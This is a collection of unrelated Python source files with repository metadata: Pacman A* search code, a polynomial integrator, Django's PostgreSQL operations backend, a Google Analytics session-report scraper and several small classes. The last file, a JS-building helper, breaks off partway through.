# This portion is incomplete. Time to write code! #
#####################################################
class FoodSearchProblem:
    """
    A search problem associated with finding the a path that collects all of the
    food (dots) in a Pacman game.
    A search state in this problem is a tuple ( pacmanPosition, foodGrid ) where
      pacmanPosition: a tuple (x,y) of integers specifying Pacman's position
      foodGrid:       a Grid (see game.py) of either True or False, specifying remaining food
    """
    def __init__(self, startingGameState):
        self.start = (startingGameState.getPacmanPosition(), startingGameState.getFood())
        self.walls = startingGameState.getWalls()
        self.startingGameState = startingGameState
        self._expanded = 0 # DO NOT CHANGE
        self.heuristicInfo = {} # A dictionary for the heuristic to store information
    def getStartState(self):
        # (pacmanPosition, foodGrid) tuple.
        return self.start
    def isGoalState(self, state):
        # Goal: no food left on the grid.
        return state[1].count() == 0
    def expand(self, state):
        "Returns child states, the actions they require, and a cost of 1."
        children = []
        self._expanded += 1 # DO NOT CHANGE
        for action in self.getActions(state):
            next_state = self.getNextState(state, action)
            action_cost = self.getActionCost(state, action, next_state)
            children.append( ( next_state, action, action_cost) )
        return children
    def getActions(self, state):
        # Legal moves are the four compass directions that don't hit a wall.
        possible_directions = [Directions.NORTH, Directions.SOUTH, Directions.EAST, Directions.WEST]
        valid_actions_from_state = []
        for action in possible_directions:
            x, y = state[0]
            dx, dy = Actions.directionToVector(action)
            nextx, nexty = int(x + dx), int(y + dy)
            if not self.walls[nextx][nexty]:
                valid_actions_from_state.append(action)
        return valid_actions_from_state
    def getActionCost(self, state, action, next_state):
        assert next_state == self.getNextState(state, action), (
            "Invalid next state passed to getActionCost().")
        return 1
    def getNextState(self, state, action):
        assert action in self.getActions(state), (
            "Invalid action passed to getActionCost().")
        x, y = state[0]
        dx, dy = Actions.directionToVector(action)
        nextx, nexty = int(x + dx), int(y + dy)
        # Copy the food grid and clear the dot (if any) at the new position.
        nextFood = state[1].copy()
        nextFood[nextx][nexty] = False
        return ((nextx, nexty), nextFood)
    def getCostOfActionSequence(self, actions):
        """Returns the cost of a particular sequence of actions. If those actions
        include an illegal move, return 999999"""
        x,y= self.getStartState()[0]
        cost = 0
        for action in actions:
            # figure out the next state and see whether it's legal
            dx, dy = Actions.directionToVector(action)
            x, y = int(x + dx), int(y + dy)
            if self.walls[x][y]:
                return 999999
            cost += 1
        return cost
class AStarFoodSearchAgent(SearchAgent):
    "A SearchAgent for FoodSearchProblem using A* and your foodHeuristic"
    def __init__(self):
        # Bind A* to the food heuristic; the SearchAgent machinery (inherited
        # registerInitialState/getAction) does the rest.
        self.searchFunction = lambda prob: search.aStarSearch(prob, foodHeuristic)
        self.searchType = FoodSearchProblem
def foodHeuristic(state, problem: FoodSearchProblem):
    """
    Heuristic for the FoodSearchProblem: the maximum true maze (BFS) distance
    from Pacman's position to any remaining food dot; 0 when no food remains.

    The state is a tuple ( pacmanPosition, foodGrid ) where foodGrid is a Grid
    (see game.py) of either True or False.

    Admissible: any plan must at least reach the farthest dot, and the maze
    distance is the exact cost of doing so while ignoring the other dots.

    Distances are memoized in problem.heuristicInfo (the dictionary provided
    for exactly this purpose), since wall layout never changes — the original
    re-ran a BFS for every (position, food) pair on every heuristic call.
    """
    position, foodGrid = state
    "*** YOUR CODE HERE ***"

    def _mazeDistance(pos1, pos2):
        # Exact shortest-path length through the maze, cached across calls.
        key = (pos1, pos2)
        if key not in problem.heuristicInfo:
            subproblem = PositionSearchProblem(
                problem.startingGameState, start=pos1, goal=pos2,
                warn=False, visualize=False)
            problem.heuristicInfo[key] = len(
                search.breadthFirstSearch(subproblem))
        return problem.heuristicInfo[key]

    foodList = foodGrid.asList()  # list of (x, y) dot coordinates
    if not foodList:
        return 0
    return max(_mazeDistance(position, food) for food in foodList)
|
[
"blueice-thu@outlook.com"
] |
blueice-thu@outlook.com
|
b301691a347e993eeb0904ec4da555a684042612
|
caf39133030e9e9d9240769fbfe72287009c6b51
|
/math/0x02-calculus/17-integrate.py
|
70e1a9c8db0993bc659e0d727a1f9eab6e7a5be6
|
[] |
no_license
|
sazad44/holbertonschool-machine_learning
|
d08facbc24582ebcedf9a8607c82b18909fe7867
|
b92e89b980a8f1360a24f4ed5654a2ab0dfac679
|
refs/heads/master
| 2022-11-30T22:32:21.264942
| 2020-08-12T05:25:06
| 2020-08-12T05:25:06
| 280,286,486
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 728
|
py
|
#!/usr/bin/env python3
"""task 17 py function to integrate a polynomial"""


def poly_integral(poly, C=0):
    """Return the coefficient list of the integral of a polynomial.

    Args:
        poly: list of numeric coefficients, index == power of x.
        C: integer constant of integration (index 0 of the result).

    Returns:
        New coefficient list with integer-valued entries collapsed to
        int and trailing zero terms trimmed, or None on invalid input.
    """
    if not isinstance(poly, list) or len(poly) == 0 or not isinstance(C, int):
        return None
    # BUG FIX (hardening): every coefficient must be a real number,
    # otherwise the division below raises instead of returning None.
    if not all(isinstance(c, (int, float)) for c in poly):
        return None
    result = [C]
    for power, coeff in enumerate(poly):
        value = coeff / (power + 1)
        # Keep exact integers as int for a clean representation.
        result.append(int(value) if value.is_integer() else value)
    # BUG FIX: the original tested sum(result) == 0, which wrongly
    # collapsed polynomials whose coefficients merely cancel (e.g.
    # [1, -2] -> [0, 1, -1] has sum 0). Only the all-zero integral
    # reduces to [0].
    if all(c == 0 for c in result):
        return [0]
    # Trim trailing zero coefficients; safe because at least one
    # coefficient is non-zero here.
    while result[-1] == 0:
        result.pop()
    return result
|
[
"36613205+sazad44@users.noreply.github.com"
] |
36613205+sazad44@users.noreply.github.com
|
bdd9f479c4b2fdd3901be2b45127d857c7560c00
|
60b1c5ab904a773e81d3f817279f9f2f72e15ac6
|
/individual.py
|
be8c4cc2e02443bef755cf708e9a8b67834da694
|
[
"MIT"
] |
permissive
|
n0lley/polycube
|
1dede161444c9f50220e8683742d95468290bdee
|
bc97b81b7455a8682fcd83f198fad437bb3dc4cb
|
refs/heads/master
| 2021-08-07T01:09:05.584330
| 2020-07-28T23:18:28
| 2020-07-28T23:18:28
| 180,885,490
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 242
|
py
|
class INDIVIDUAL:
    """Abstract base for evolvable individuals.

    Subclasses must implement construction, mutation, and fitness
    evaluation; every method here is a required override.
    """

    def __init__(self, *args, **kwargs):
        # Subclasses define their own genome construction.
        raise NotImplementedError

    def mutate(self, *args, **kwargs):
        # Subclasses define how a genome is perturbed.
        raise NotImplementedError

    def evaluate(self, *args, **kwargs):
        # Subclasses define how fitness is measured.
        raise NotImplementedError
|
[
"david.matthews.1@uvm.edu"
] |
david.matthews.1@uvm.edu
|
dc23bbd95004a5f6fa4e5a6ef31d8b013040ba34
|
6874015cb6043d1803b61f8978627ddce64963b4
|
/django/db/backends/postgresql/operations.py
|
0edcf42febaa364b316750501cb20183caacea8e
|
[
"BSD-3-Clause",
"Python-2.0"
] |
permissive
|
yephper/django
|
25fbfb4147211d08ec87c41e08a695ac016454c6
|
cdd1689fb354886362487107156978ae84e71453
|
refs/heads/master
| 2021-01-21T12:59:14.443153
| 2016-04-27T09:51:41
| 2016-04-27T09:51:41
| 56,134,291
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,101
|
py
|
from __future__ import unicode_literals
from psycopg2.extras import Inet
from django.conf import settings
from django.db.backends.base.operations import BaseDatabaseOperations
class DatabaseOperations(BaseDatabaseOperations):
    """PostgreSQL-specific SQL generation helpers for Django's ORM backend."""

    def unification_cast_sql(self, output_field):
        """Return a placeholder template, casting types UNION cannot infer."""
        internal_type = output_field.get_internal_type()
        if internal_type in ("GenericIPAddressField", "IPAddressField", "TimeField", "UUIDField"):
            # PostgreSQL will resolve a union as type 'text' if input types are
            # 'unknown'.
            # http://www.postgresql.org/docs/9.4/static/typeconv-union-case.html
            # These fields cannot be implicitly cast back in the default
            # PostgreSQL configuration so we need to explicitly cast them.
            # We must also remove components of the type within brackets:
            # varchar(255) -> varchar.
            return 'CAST(%%s AS %s)' % output_field.db_type(self.connection).split('(')[0]
        return '%s'

    def date_extract_sql(self, lookup_type, field_name):
        """Return SQL extracting one part (year, month, ...) of a date column."""
        # http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-EXTRACT
        if lookup_type == 'week_day':
            # For consistency across backends, we return Sunday=1, Saturday=7.
            return "EXTRACT('dow' FROM %s) + 1" % field_name
        else:
            return "EXTRACT('%s' FROM %s)" % (lookup_type, field_name)

    def date_trunc_sql(self, lookup_type, field_name):
        """Return SQL truncating a date column to `lookup_type` precision."""
        # http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
        return "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)

    def _convert_field_to_tz(self, field_name, tzname):
        """Wrap `field_name` in an AT TIME ZONE clause when USE_TZ is enabled."""
        if settings.USE_TZ:
            field_name = "%s AT TIME ZONE %%s" % field_name
            params = [tzname]
        else:
            params = []
        return field_name, params

    def datetime_cast_date_sql(self, field_name, tzname):
        """Return (sql, params) casting a timestamp column to a local date."""
        field_name, params = self._convert_field_to_tz(field_name, tzname)
        sql = '(%s)::date' % field_name
        return sql, params

    def datetime_extract_sql(self, lookup_type, field_name, tzname):
        """Return (sql, params) extracting a datetime part in the given zone."""
        field_name, params = self._convert_field_to_tz(field_name, tzname)
        sql = self.date_extract_sql(lookup_type, field_name)
        return sql, params

    def datetime_trunc_sql(self, lookup_type, field_name, tzname):
        """Return (sql, params) truncating a datetime in the given zone."""
        field_name, params = self._convert_field_to_tz(field_name, tzname)
        # http://www.postgresql.org/docs/current/static/functions-datetime.html#FUNCTIONS-DATETIME-TRUNC
        sql = "DATE_TRUNC('%s', %s)" % (lookup_type, field_name)
        return sql, params

    def deferrable_sql(self):
        # Constraint suffix: FK checks run at transaction commit, not per row.
        return " DEFERRABLE INITIALLY DEFERRED"

    def fetch_returned_insert_ids(self, cursor):
        """
        Given a cursor object that has just performed an INSERT...RETURNING
        statement into a table that has an auto-incrementing ID, return the
        list of newly created IDs.
        """
        return [item[0] for item in cursor.fetchall()]

    def lookup_cast(self, lookup_type, internal_type=None):
        """Return the placeholder template applied to the LHS of a lookup."""
        lookup = '%s'
        # Cast text lookups to text to allow things like filter(x__contains=4)
        if lookup_type in ('iexact', 'contains', 'icontains', 'startswith',
                           'istartswith', 'endswith', 'iendswith', 'regex', 'iregex'):
            if internal_type in ('IPAddressField', 'GenericIPAddressField'):
                lookup = "HOST(%s)"
            else:
                lookup = "%s::text"
        # Use UPPER(x) for case-insensitive lookups; it's faster.
        if lookup_type in ('iexact', 'icontains', 'istartswith', 'iendswith'):
            lookup = 'UPPER(%s)' % lookup
        return lookup

    def last_insert_id(self, cursor, table_name, pk_name):
        """Return the current value of `table_name`'s serial PK sequence."""
        # Use pg_get_serial_sequence to get the underlying sequence name
        # from the table name and column name (available since PostgreSQL 8)
        cursor.execute("SELECT CURRVAL(pg_get_serial_sequence('%s','%s'))" % (
            self.quote_name(table_name), pk_name))
        return cursor.fetchone()[0]

    def no_limit_value(self):
        # PostgreSQL needs no sentinel: omitting LIMIT means "no limit".
        return None

    def prepare_sql_script(self, sql):
        # psycopg2 can execute a multi-statement string as a single unit.
        return [sql]

    def quote_name(self, name):
        """Double-quote an identifier unless it is already quoted."""
        if name.startswith('"') and name.endswith('"'):
            return name  # Quoting once is enough.
        return '"%s"' % name

    def set_time_zone_sql(self):
        return "SET TIME ZONE %s"

    def sql_flush(self, style, tables, sequences, allow_cascade=False):
        """Return statements emptying `tables` and resetting their sequences."""
        if tables:
            # Perform a single SQL 'TRUNCATE x, y, z...;' statement. It allows
            # us to truncate tables referenced by a foreign key in any other
            # table.
            tables_sql = ', '.join(
                style.SQL_FIELD(self.quote_name(table)) for table in tables)
            if allow_cascade:
                sql = ['%s %s %s;' % (
                    style.SQL_KEYWORD('TRUNCATE'),
                    tables_sql,
                    style.SQL_KEYWORD('CASCADE'),
                )]
            else:
                sql = ['%s %s;' % (
                    style.SQL_KEYWORD('TRUNCATE'),
                    tables_sql,
                )]
            sql.extend(self.sequence_reset_by_name_sql(style, sequences))
            return sql
        else:
            return []

    def sequence_reset_by_name_sql(self, style, sequences):
        # 'ALTER SEQUENCE sequence_name RESTART WITH 1;'... style SQL statements
        # to reset sequence indices
        sql = []
        for sequence_info in sequences:
            table_name = sequence_info['table']
            column_name = sequence_info['column']
            if not (column_name and len(column_name) > 0):
                # This will be the case if it's an m2m using an autogenerated
                # intermediate table (see BaseDatabaseIntrospection.sequence_list)
                column_name = 'id'
            sql.append("%s setval(pg_get_serial_sequence('%s','%s'), 1, false);" %
                       (style.SQL_KEYWORD('SELECT'),
                        style.SQL_TABLE(self.quote_name(table_name)),
                        style.SQL_FIELD(column_name))
                       )
        return sql

    def tablespace_sql(self, tablespace, inline=False):
        """Return the tablespace clause; `inline` selects the index form."""
        if inline:
            return "USING INDEX TABLESPACE %s" % self.quote_name(tablespace)
        else:
            return "TABLESPACE %s" % self.quote_name(tablespace)

    def sequence_reset_sql(self, style, model_list):
        """Return setval() statements syncing each model's PK sequence to max(pk)."""
        from django.db import models
        output = []
        qn = self.quote_name
        for model in model_list:
            # Use `coalesce` to set the sequence for each model to the max pk value if there are records,
            # or 1 if there are none. Set the `is_called` property (the third argument to `setval`) to true
            # if there are records (as the max pk value is already in use), otherwise set it to false.
            # Use pg_get_serial_sequence to get the underlying sequence name from the table name
            # and column name (available since PostgreSQL 8)
            for f in model._meta.local_fields:
                if isinstance(f, models.AutoField):
                    output.append(
                        "%s setval(pg_get_serial_sequence('%s','%s'), "
                        "coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
                            style.SQL_KEYWORD('SELECT'),
                            style.SQL_TABLE(qn(model._meta.db_table)),
                            style.SQL_FIELD(f.column),
                            style.SQL_FIELD(qn(f.column)),
                            style.SQL_FIELD(qn(f.column)),
                            style.SQL_KEYWORD('IS NOT'),
                            style.SQL_KEYWORD('FROM'),
                            style.SQL_TABLE(qn(model._meta.db_table)),
                        )
                    )
                    break  # Only one AutoField is allowed per model, so don't bother continuing.
            for f in model._meta.many_to_many:
                if not f.remote_field.through:
                    output.append(
                        "%s setval(pg_get_serial_sequence('%s','%s'), "
                        "coalesce(max(%s), 1), max(%s) %s null) %s %s;" % (
                            style.SQL_KEYWORD('SELECT'),
                            style.SQL_TABLE(qn(f.m2m_db_table())),
                            style.SQL_FIELD('id'),
                            style.SQL_FIELD(qn('id')),
                            style.SQL_FIELD(qn('id')),
                            style.SQL_KEYWORD('IS NOT'),
                            style.SQL_KEYWORD('FROM'),
                            style.SQL_TABLE(qn(f.m2m_db_table()))
                        )
                    )
        return output

    def prep_for_iexact_query(self, x):
        # No transformation needed: UPPER() casting happens in lookup_cast.
        return x

    def max_name_length(self):
        """
        Returns the maximum length of an identifier.
        Note that the maximum length of an identifier is 63 by default, but can
        be changed by recompiling PostgreSQL after editing the NAMEDATALEN
        macro in src/include/pg_config_manual.h .
        This implementation simply returns 63, but can easily be overridden by a
        custom database backend that inherits most of its behavior from this one.
        """
        return 63

    def distinct_sql(self, fields):
        """Return DISTINCT or PostgreSQL's DISTINCT ON (...) clause."""
        if fields:
            return 'DISTINCT ON (%s)' % ', '.join(fields)
        else:
            return 'DISTINCT'

    def last_executed_query(self, cursor, sql, params):
        # http://initd.org/psycopg/docs/cursor.html#cursor.query
        # The query attribute is a Psycopg extension to the DB API 2.0.
        if cursor.query is not None:
            return cursor.query.decode('utf-8')
        return None

    def return_insert_id(self):
        # Clause template plus its (empty) parameter tuple.
        return "RETURNING %s", ()

    def bulk_insert_sql(self, fields, placeholder_rows):
        """Return the VALUES clause for a multi-row INSERT."""
        placeholder_rows_sql = (", ".join(row) for row in placeholder_rows)
        values_sql = ", ".join("(%s)" % sql for sql in placeholder_rows_sql)
        return "VALUES " + values_sql

    def adapt_datefield_value(self, value):
        # psycopg2 adapts date objects natively; no conversion needed.
        return value

    def adapt_datetimefield_value(self, value):
        # psycopg2 adapts datetime objects natively; no conversion needed.
        return value

    def adapt_timefield_value(self, value):
        # psycopg2 adapts time objects natively; no conversion needed.
        return value

    def adapt_ipaddressfield_value(self, value):
        """Wrap non-empty IP values in psycopg2's Inet adapter."""
        if value:
            return Inet(value)
        return None

    def subtract_temporals(self, internal_type, lhs, rhs):
        """Return SQL for lhs - rhs; DateField pairs use age() for an interval."""
        if internal_type == 'DateField':
            lhs_sql, lhs_params = lhs
            rhs_sql, rhs_params = rhs
            return "age(%s, %s)" % (lhs_sql, rhs_sql), lhs_params + rhs_params
        return super(DatabaseOperations, self).subtract_temporals(internal_type, lhs, rhs)
|
[
"smileszzh@163.com"
] |
smileszzh@163.com
|
b08dd544b2f32a4764ba76171b76226e77090569
|
2628f51ef7ab5aae691dc72556ab312cc5b2a876
|
/venv/lib/python3.8/site-packages/unyt/_version.py
|
c41cbda0701c4538c26555538502bd76e89985b4
|
[
"BSD-3-Clause"
] |
permissive
|
Jack-kelly-22/ps-4
|
f933a8bb7bf5c865d846a30a5e0c8352c448a18d
|
fbbf327f1717bbd1902f437147640dfdf6aa118c
|
refs/heads/master
| 2023-02-10T23:56:48.499720
| 2021-01-05T21:43:59
| 2021-01-05T21:43:59
| 327,124,314
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 498
|
py
|
# This file was generated by 'versioneer.py' (0.18) from
# revision-control system data, or from the parent directory name of an
# unpacked source archive. Distribution tarballs contain a pre-generated copy
# of this file.
import json

# Machine-written version metadata; do not edit by hand.
version_json = '''
{
"date": "2020-10-05T14:17:00-0600",
"dirty": false,
"error": null,
"full-revisionid": "eeefa00a2fddbf0dba6ab854e968ef43e31f851e",
"version": "v2.8.0"
}
'''  # END VERSION_JSON


def get_versions():
    """Return the versioneer metadata as a dict."""
    return json.loads(version_json)
|
[
"Jacklaxjk@gmail.com"
] |
Jacklaxjk@gmail.com
|
b779dffe55d8fb13948ccc43312f57df7c9b48af
|
987d44772eb85c61deefe2986598903c9e965008
|
/_site/site/performance_dashboard/data/GA/GA_scraper.py
|
46864696a95d0a3d5b6fe1092f9e2c4dbe8719fb
|
[] |
no_license
|
casten4congress/casten4congress.github.io
|
40e92ac86088c941f9180839e6e1b1b8cf3fb837
|
456caaf8503ed63a7903ccf9dc19d23c914a1ca1
|
refs/heads/master
| 2020-03-12T17:32:29.826443
| 2018-07-17T20:39:41
| 2018-07-17T20:39:41
| 130,738,470
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 7,429
|
py
|
import json
from apiclient.discovery import build
from oauth2client.service_account import ServiceAccountCredentials
# Municipalities inside the district -- GA rows from other cities are ignored.
municipalities_list = ['Bartlett', 'Palatine', 'Lisle', 'Lakewood', 'Winfield', 'Carol Stream', 'Downers Grove', 'Westmont', 'Kildeer', 'Glen Ellyn', 'Burr Ridge', 'Long Grove', 'Barrington Hills', 'Wayne', 'Naperville', 'Forest Lake', 'Trout Valley', 'Rolling Meadows', 'Inverness', 'Clarendon Hills', 'St. Charles', 'South Barrington', 'Deer Park', 'Algonquin', 'Hoffman Estates', 'Wheaton', 'Lombard', 'Lake Zurich', 'Port Barrington', 'Hawthorn Woods', 'East Dundee', 'Fox River Grove', 'Lake in the Hills', 'Crystal Lake', 'Darien', 'Oakwood Hills', 'West Dundee', 'Oakbrook Terrace', 'Sleepy Hollow', 'Hinsdale', 'South Elgin', 'Lake Barrington', 'Gilberts', 'Tower Lakes', 'Cary', 'Willowbrook', 'North Barrington', 'Carpentersville', 'Oak Brook', 'Warrenville', 'Elgin', 'Willowbrook', 'West Chicago', 'Barrington']
# Read-only scope is sufficient for the Reporting API.
SCOPES = ['https://www.googleapis.com/auth/analytics.readonly']
# Service-account identity used for API authentication.
SERVICE_ACCOUNT_EMAIL = 'ejerzyk@phonic-server-203118.iam.gserviceaccount.com'
KEY_FILE_LOCATION = 'client_secrets.json'
# GA view (profile) the reports are pulled from.
VIEW_ID = '154261248'
def initialize_analyticsreporting():
    """Build an authorized Analytics Reporting API V4 service object.

    Returns:
        The service object, ready for report queries.
    """
    service_creds = ServiceAccountCredentials.from_json_keyfile_name(
        KEY_FILE_LOCATION, SCOPES)
    # Assemble and return the API client in one step.
    return build('analyticsreporting', 'v4', credentials=service_creds)
def get_report(analytics, dims, dateranges):
    """Query the Analytics Reporting API V4 for session counts.

    Args:
        analytics: authorized Reporting API V4 service object.
        dims: dimension spec(s) for the request.
        dateranges: list of {'startDate', 'endDate'} dicts.

    Returns:
        The raw Analytics Reporting API V4 response.
    """
    request = {
        'viewId': VIEW_ID,
        'dateRanges': dateranges,
        'metrics': [{'expression': 'ga:sessions'}],
        'dimensions': [dims],
    }
    return analytics.reports().batchGet(
        body={'reportRequests': [request]}
    ).execute()
def print_response(response):
    """Parse a Reporting API V4 response into a nested session-count dict.

    Despite the name, this also returns a mapping of municipality ->
    sessions, nested one or two levels deeper by age bracket and/or
    gender depending on the dimensions that were requested.

    Args:
        response: An Analytics Reporting API V4 response.
    """
    # NOTE(review): these flags are initialized once and never reset per
    # row, so a matched city carries over to later rows -- confirm intent.
    printP = False
    mun = ''
    age = ''
    gen = ''
    for report in response.get('reports', []):
        columnHeader = report.get('columnHeader', {})
        dimensionHeaders = columnHeader.get('dimensions', [])
        metricHeaders = columnHeader.get('metricHeader', {}).get('metricHeaderEntries', [])
        # NOTE(review): to_return is reset per report, so only the last
        # report's data is returned -- confirm a single report is expected.
        to_return = {}
        for row in report.get('data', {}).get('rows', []):
            dimensions = row.get('dimensions', [])
            dateRangeValues = row.get('metrics', [])
            for header, dimension in zip(dimensionHeaders, dimensions):
                print header + ": " + dimension
                if header=='ga:city' and dimension in municipalities_list:
                    mun = dimension
                    printP = True
                elif header=='ga:userGender': gen = dimension
                elif header=='ga:userAgeBracket': age = dimension
            for i, values in enumerate(dateRangeValues):
                for metricHeader, value in zip(metricHeaders, values.get('values')):
                    value = int(value)
                    if printP:
                        if gen!='' and age!='':
                            if mun in to_return.keys():
                                # NOTE(review): the else branch below replaces the
                                # whole entry for `mun`, dropping previously seen
                                # age brackets; it looks like it should assign
                                # to_return[mun][age] = {gen: value} -- confirm.
                                if age in to_return[mun].keys(): to_return[mun][age][gen] = value
                                else: to_return[mun] = {age: {gen: value}}
                            else: to_return[mun] = {age: {gen: value}}
                        elif gen!='':
                            if mun in to_return.keys(): to_return[mun][gen] = value
                            else: to_return[mun] = {gen: value}
                        elif age!='':
                            if mun in to_return.keys(): to_return[mun][age] = value
                            else: to_return[mun] = {age: value}
                        else: to_return[mun] = value
    return to_return
def LA(dateranges):
    """Location-by-age report: each municipality's share of sessions per bracket.

    Args:
        dateranges: list of {'startDate', 'endDate'} dicts.

    Returns:
        dict mapping municipality -> {bracket: share of district total}.
    """
    analytics = initialize_analyticsreporting()
    response = get_report(analytics, [{'name': 'ga:city'}, {'name':'ga:userAgeBracket'}], dateranges)
    d = print_response(response)
    # District-wide totals per bracket (normalization denominators).
    total_18_24 = 0
    total_25_34 = 0
    total_35_44 = 0
    total_45_54 = 0
    total_55_64 = 0
    total_65 = 0
    for city in d.keys():
        print city
        total_18_24 += int(d[city].get('18-24',0))
        total_25_34 += int(d[city].get('25-34',0))
        total_35_44 += int(d[city].get('35-44',0))
        total_45_54 += int(d[city].get('45-54',0))
        total_55_64 += int(d[city].get('55-64',0))
        total_65 += int(d[city].get('65+',0))
    # NOTE(review): a bracket with zero district-wide sessions would raise
    # ZeroDivisionError below -- confirm that case cannot occur.
    for city in d.keys():
        d[city]['18-24'] = float(d[city].get('18-24',0))/total_18_24
        d[city]['25-34'] = float(d[city].get('25-34',0))/total_25_34
        d[city]['35-44'] = float(d[city].get('35-44',0))/total_35_44
        d[city]['45-54'] = float(d[city].get('45-54',0))/total_45_54
        d[city]['55-64'] = float(d[city].get('55-64',0))/total_55_64
        d[city]['65+'] = float(d[city].get('65+',0))/total_65
    # Municipalities with no recorded traffic get explicit zero entries.
    for city in municipalities_list:
        if city not in d.keys():
            d[city] = {}
            d[city]['18-24'] = 0
            d[city]['25-34'] = 0
            d[city]['35-44'] = 0
            d[city]['45-54'] = 0
            d[city]['55-64'] = 0
            d[city]['65+'] = 0
    return d
def LG(dateranges):
    """Location-by-gender report: share of sessions per municipality.

    Args:
        dateranges: list of {'startDate', 'endDate'} dicts.

    Returns:
        dict mapping municipality -> {'female': share, 'male': share}.
    """
    analytics = initialize_analyticsreporting()
    response = get_report(analytics, [{'name': 'ga:city'}, {'name':'ga:userGender'}], dateranges)
    d = print_response(response)
    # District-wide totals used as normalization denominators.
    total_female = sum(d[city].get('female', 0) for city in d.keys())
    total_male = sum(d[city].get('male', 0) for city in d.keys())
    for city in d.keys():
        d[city]['female'] = float(d[city].get('female', 0)) / total_female
        d[city]['male'] = float(d[city].get('male', 0)) / total_male
    # Municipalities with no recorded traffic get explicit zero entries.
    for city in municipalities_list:
        if city not in d.keys():
            d[city] = {'female': 0, 'male': 0}
    return d
def L(dateranges):
    """Location-only report: each municipality's share of all sessions.

    Args:
        dateranges: list of {'startDate', 'endDate'} dicts.

    Returns:
        dict mapping municipality -> fraction of total sessions.
    """
    analytics = initialize_analyticsreporting()
    response = get_report(analytics, [{'name': 'ga:city'}], dateranges)
    d = print_response(response)
    # Normalize each city's count by the district-wide total.
    total = sum(d[city] for city in d.keys())
    for city in d.keys():
        d[city] = float(d[city]) / total
    # Municipalities with no recorded traffic get explicit zero entries.
    for city in municipalities_list:
        if city not in d.keys():
            d[city] = 0
    return d
def _write_outputs(var_name, base_filename, data):
    """Write `data` as a JS assignment (<base>.js) and as raw JSON (<base>.json)."""
    # BUG FIX: the original re-opened output_f without ever closing the
    # previous handle; `with` guarantees both files are flushed and closed.
    with open(base_filename, 'w') as js_file:
        js_file.write("var " + var_name + " = " + json.dumps(data) + ";")
    with open(base_filename + 'on', 'w') as json_file:
        json_file.write(json.dumps(data))


def main():
    """Generate the 1-month / 3-month / 1-year dashboard data files."""
    dateranges = {
        '1mo': [{'startDate': '2018-04-08', 'endDate': 'today'}],
        '3mo': [{'startDate': '2018-02-08', 'endDate': 'today'}],
        '1yr': [{'startDate': '2017-05-08', 'endDate': 'today'}],
    }
    # Location by age bracket.
    _write_outputs('la', 'LA.js', {k: LA(v) for k, v in dateranges.items()})
    # Location by gender.
    _write_outputs('lg', 'LG.js', {k: LG(v) for k, v in dateranges.items()})
    # Location only.
    _write_outputs('l', 'L.js', {k: L(v) for k, v in dateranges.items()})


if __name__ == '__main__':
    main()
|
[
"ejerzyk@gmail.com"
] |
ejerzyk@gmail.com
|
a2db15dc70256c5ac16e2d712ccd8393faf996ac
|
c820e028be4239bc20e76af41574e561ba8d8e02
|
/gsw/version.py
|
2f5fd65dfc4d9ab9ae7c7b3df560f34efabacd78
|
[
"MIT"
] |
permissive
|
lukecampbell/python-gsw
|
7657c2e3a0dbadad00ff17557f4ca45f971f3964
|
c555921b5f1fcbc1c1a3565172b946f782d15db4
|
refs/heads/master
| 2016-09-06T16:54:47.074484
| 2013-02-20T20:00:03
| 2013-02-20T20:00:03
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43
|
py
|
#!/usr/bin/env python
version = '3.0.1a1'
|
[
"luke.s.campbell@gmail.com"
] |
luke.s.campbell@gmail.com
|
ab523c3751accac0cb2820f8f76621d3ca5474ab
|
53fab060fa262e5d5026e0807d93c75fb81e67b9
|
/backup/user_172/ch88_2020_05_06_12_07_01_120079.py
|
65c8bdbe203ac21abf9a6631e62483803e27d184
|
[] |
no_license
|
gabriellaec/desoft-analise-exercicios
|
b77c6999424c5ce7e44086a12589a0ad43d6adca
|
01940ab0897aa6005764fc220b900e4d6161d36b
|
refs/heads/main
| 2023-01-31T17:19:42.050628
| 2020-12-16T05:21:31
| 2020-12-16T05:21:31
| 306,735,108
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 344
|
py
|
class Retangulo:
    """Axis-aligned rectangle defined by two corner points.

    Attributes:
        coord1: lower-left corner (object with .x and .y).
        coord2: upper-right corner (object with .x and .y).
    """

    def __init__(self, coord1, coord2):
        # BUG FIX: the original spelled the constructor `_init_` (missing
        # dunder underscores), so it never ran; it also discarded its
        # arguments and referenced undefined names (Ponto, x1, y1, ...).
        # Store the corner points the caller provides.
        self.coord1 = coord1
        self.coord2 = coord2

    def calcula_perimetro(self):
        """Return the rectangle's perimeter (the original computed but never returned it)."""
        base = self.coord2.x - self.coord1.x
        altura = self.coord2.y - self.coord1.y
        return 2 * base + 2 * altura

    def calcula_area(self):
        """Return the rectangle's area (the original computed but never returned it)."""
        base = self.coord2.x - self.coord1.x
        altura = self.coord2.y - self.coord1.y
        return base * altura
|
[
"you@example.com"
] |
you@example.com
|
6e366b23ce962f4acf818615c993eb9f30b28562
|
d8f44692c9f9f0a9a391a49db0f4f659a2ef6fe8
|
/jsBuilds/jsSupport.py
|
4817320de831b302adb53f3eddacb01f0fbe8e4b
|
[
"MIT"
] |
permissive
|
skylarkgit/sql2phpclass
|
045e71963574b719313fc98882f5c710435f101f
|
a79e7f3cfda8cb41ba00e8cbba0de33e9be759d6
|
refs/heads/master
| 2020-03-19T02:34:34.229287
| 2018-07-04T18:58:28
| 2018-07-04T18:58:28
| 135,640,687
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 759
|
py
|
import sys
sys.path.append('..')
from jsBuilds.jsTemplates import *
def args(varList):
    # Render a JS argument list: ["a", "b"] -> "a,b".
    return ','.join(varList)
def reqData(varList):
    """Render a JS expression building a query string from `obj` fields.

    Example: ["a", "b"] -> '"a="+obj.a+"&"+"b="+obj.b'

    BUG FIX: the original emitted '"a="obj.a' -- in Python the adjacent
    string literals merged ('="obj.'), dropping the JS `+` between the
    literal and the property access, which is a JavaScript syntax error.
    """
